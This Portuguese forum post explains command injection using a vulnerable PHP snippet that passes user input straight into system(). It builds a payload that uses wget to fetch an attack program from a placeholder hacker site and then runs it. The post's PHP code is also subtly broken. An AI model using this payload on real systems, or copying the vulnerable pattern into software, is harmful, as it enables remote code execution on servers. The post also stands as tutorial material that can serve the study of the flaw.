V¡®u§ 849 Posted February 16, 2012 To de volta http://cyber-gamers.org/public/style_emoticons/default/ph34r.png Qual é a injeção de comandos?Injeção de comandos é um método de ataque em que altera o conteúdo gerado dinamicamente em uma página da Web digitando comandos shell em um mecanismo de entrada, como um campo de formulário que não tem restrições de validação eficazes. Podemos explorar essa vulnerabilidade para obter acesso não autorizado a dados ou recursos de rede. Quando os usuários visitam uma página da Web afetada, seus navegadores interpretar o código, que pode causar comandos maliciosos sejam executados em computadores dos usuários e em suas redes. O objetivo do ataque de injeção de comando é para injetar e executar comandos especificados pelo atacante no site vulnerável. Em situação como esta, a aplicação, que executa os comandos do sistema não desejadas, é como uma concha pseudo sistema, e que o atacante pode usá-lo como qualquer usuário do sistema autorizado. No entanto, os comandos são executados com os mesmos privilégios e meio ambiente como o aplicativo tem. Ataques de injeção de comando é possível na maioria dos casos por falta de correta validação de dados de entrada, que pode ser manipulado pelo atacante (formulários, cookies, cabeçalhos HTTP, etc.) Isso pode acontecer em qualquer linguagem de programação, mas é muito comum em PERL, PHP e CGI shell baseado. é menos comum em Java, Python e C + + .. http://cyber-gamers.org/public/style_emoticons/default/happy.png eu não tentei ainda lá, tentei uma vez ou duas vezes, mas não é capaz de fazê-lo, por isso incomum .. http://cyber-gamers.org/public/style_emoticons/default/rolleyes.gifVamos entender as coisas através de exemplos Considere o código abaixo PHP: <?PHP $email_subject ="Bem-vindo à Cyber-Gamers"; if ( isset ($_GET {'email'} ) ) { system( "mail " + $_GET {'email'}) + "-s ' " + $email_subject + " ' < /tmp/email_body", $return_val); } ?>O código acima é um exemplo onde o usuário envia o seu endereço de e-mail no parâmetro e-mail, e que a entrada do usuário é colocado diretamente no comando do sistema. Agora semelhante ao SQL injection ou injeção XPath, nosso objetivo é injetar o comando shell para o parâmetro-mail, mas tornar o código certo antes e depois do parâmetro e-mail permanecem sintaticamente corrigir caso contrário, a injecção não será executado. Considere o sistema () chamada como jogo pequeno quebra-cabeça onde arranjar peça de quebra-cabeça diferente para fazer uma única imagem. Todas as peças, exceto uma parte estão no seu lugar, agora temos de encontrar a parte do meio para terminar o quebra-cabeça .. http://cyber-gamers.org/public/style_emoticons/default/laugh.png tarefa simples no jogo, mas pouco complicado na injeção de comandos. Assim, nosso objetivo é algo mostrado abaixo: mail [missing puzzle part] -s 'Bem-vindo à Cyber-Gamers' </tmp/email_bodyNota: Para a peça de quebra-cabeça faltando, precisamos garantir que o comando é executado corretamente e-mail e sai corretamente, basicamente, eu quero concentrar-se na sintaxe, deve ser sintaticamente correto.Para o correio exemplo - corridas de ajuda vontade e saídas corretamente. Agora podemos acrescentar outros comandos shell adicionais, separando os comandos por um ponto e vírgula (;). Nós também podemos comentar a parte de quebra-cabeça faltando usando o símbolo shell comentando (#) na frente. Assim, podemos manipular a peça de quebra-cabeça faltando conforme abaixo: --help; wget http://somehackersit...attack_program; ./attack_program #Agora, a adição de nossa parte de quebra-cabeça faltando para o nosso comando shell original existente, o comando abaixo shell é criado: mail --help; wget http://somehackersit...attack_program; ./attack_program # s 'Bem-vindo à Cyber-Gamers' < /tmp/email_bodyEste comando resultante é equivalente a abaixo de comando: mail --help; wget http://somehackersit...attack_program; ./attack_programO comando acima irá corre o e-mail - help e então faz o download do programa de ataque de somehackersite.com e executa-lo em vítima, permitindo que o hacker para executar os comandos arbitrários no site vulnerável. Na maioria dos casos, fornecer o acesso completo ao diretório raiz .. http://cyber-gamers.org/public/style_emoticons/default/sleep.png Agora fazer o que você quiser.... Nota: Esta é apenas para fins educacionais.Qualquer que você fizer to nen ai nen ti conheço http://cyber-gamers.org/public/style_emoticons/default/ph34r.png 1 p0w3r0ff reacted to this Share this post Link to post Share on other sites